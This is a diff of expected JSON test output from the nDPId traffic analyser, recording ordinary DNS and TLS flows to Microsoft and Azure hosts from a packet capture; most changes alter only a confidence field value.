00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1626168077441,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1626168077441,"pkt":"WNVuaKQA8BiYFWV8CABFAABlf9gAAEARKH\/AqAF5CAgICP\/UADUAUcNfVk0BAAABAAAAAAAAGHdkLXByb2QtY3AtZXUtbm9ydGgtMi1mZQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AAEEAAQ=="} -00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077441,"flow_last_seen":1626168077441,"flow_idle_time":200000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1626168077441,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077441,"flow_last_seen":1626168077441,"flow_idle_time":200000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1626168077441,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077469,"flow_last_seen":1626168077469,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077469,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1626168077469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077469,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KWAbtjvPcwAAAAALAC\/\/\/cwgAAAgQFtAEDAwYBAQgKPdH4ZwAAAAAEAgAA"} 00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1626168077486,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1626168077486,"pkt":"8BiYFWV8WNVuaKQACABFAADs3EYAAHkRkokICAgIwKgBeQA12Q8A2KuGXeWBgAABAAIAAQAABHdkY3AJbWljcm9zb2Z0A2NvbQAAQQABwAwABQABAAAN4AAfCndkLXByb2QtY3AOdHJhZmZpY21hbmFnZXIDbmV0AMAwAAUAAQAAAG0ANhh3ZC1wcm9kLWNwLWV1LW5vcnRoLTEtZmULbm9ydGhldXJvcGUIY2xvdWRhcHAFYXp1cmXAG8B0AAYAAQAAADsAMwRwcmQxDmF6dXJlZG5zLWNsb3VkwEoGbXNuaHN0wBEAACcRAAADhAAAASwACTqAAAAAPA=="} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077413,"flow_last_seen":1626168077486,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1626168077486,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":65,"rsp_type":5,"rsp_addr":"0.0.0.0"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077413,"flow_last_seen":1626168077486,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1626168077486,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":65,"rsp_type":5,"rsp_addr":"0.0.0.0"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077506,"flow_last_seen":1626168077506,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077506,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1626168077506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077506,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KXAbtENsV0AAAAALAC\/\/8t3wAAAgQFtAEDAwYBAQgKPdH4jAAAAAAEAgAA"} 00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1626168077507,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1626168077507,"pkt":"8BiYFWV8WNVuaKQACABFAACx7P0AAHkRgg0ICAgIwKgBeQA1\/9QAnZiFVk2BgAABAAAAAQAAGHdkLXByb2QtY3AtZXUtbm9ydGgtMi1mZQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AAEEAAcAlAAYAAQAAADsAQARwcmQxDmF6dXJlZG5zLWNsb3VkA25ldAAGbXNuaHN0CW1pY3Jvc29mdMBAAAAnEQAAA4QAAAEsAAk6gAAAADw="} -00836{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":46,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077441,"flow_last_seen":1626168077507,"flow_idle_time":200000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1626168077507,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00836{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":46,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077441,"flow_last_seen":1626168077507,"flow_idle_time":200000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1626168077507,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1626168077517,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077517,"pkt":"8BiYFWV8WNVuaKQACABFAAA0QHFAAG0G2JEocQovwKgBeQG70pbavX69Y7z3MYAS\/\/\/xlwAAAgQFoAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1626168077517,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168077517,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KWAbtjvPcx2r1+vlAQEAAiVwAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077469,"flow_last_seen":1626168077517,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168077517,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077469,"flow_last_seen":1626168077517,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168077517,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1626168077557,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077557,"pkt":"8BiYFWV8WNVuaKQACABFAAA0ihJAAG0GjvAocQovwKgBeQG70pd9bt1TRDbFdYAS\/\/9BkgAAAgQFoAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1626168077557,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168077557,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KXAbtENsV1fW7dVFAQEAByUQAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077506,"flow_last_seen":1626168077557,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168077557,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077469,"flow_last_seen":1626168077565,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168077565,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077506,"flow_last_seen":1626168077557,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168077557,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077469,"flow_last_seen":1626168077565,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168077565,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1626168077590,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1626168077590,"pkt":"WNVuaKQA8BiYFWV8CABFAAA\/efAAAEARLo3AqAF5CAgICMikADUAK6rjycUBAAABAAAAAAAAA3d3dwltaWNyb3NvZnQDY29tAABBAAE="} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1626168077590,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1626168077590,"pkt":"WNVuaKQA8BiYFWV8CABFAAA\/el4AAEARLh\/AqAF5CAgICOMxADUAK47tCy8BAAABAAAAAAAAA3d3dwltaWNyb3NvZnQDY29tAAABAAE="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1626168077604,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1626168077604,"pkt":"8BiYFWV8WNVuaKQACABFAAETO6UAAHgRNAQICAgIwKgBeQA1yKQA\/zFnycWBgAABAAMAAQAAA3d3dwltaWNyb3NvZnQDY29tAABBAAHADAAFAAEAAAelACMDd3d3CW1pY3Jvc29mdAdjb20tYy0zB2VkZ2VrZXkDbmV0AMAvAAUAAQAAAHAANwN3d3cJbWljcm9zb2Z0B2NvbS1jLTMHZWRnZWtleQNuZXQLZ2xvYmFscmVkaXIGYWthZG5zwE3AXgAFAAEAAAAZABkGZTEzNjc4BGRzY2IKYWthbWFpZWRnZcBNwKgABgABAAAAMgAxBm4wZHNjYsCtCmhvc3RtYXN0ZXIGYWthbWFpwBpg7VdYAAAD6AAAA+gAAAPoAAAHCA=="} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":65,"rsp_type":5,"rsp_addr":"0.0.0.0"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":65,"rsp_type":5,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 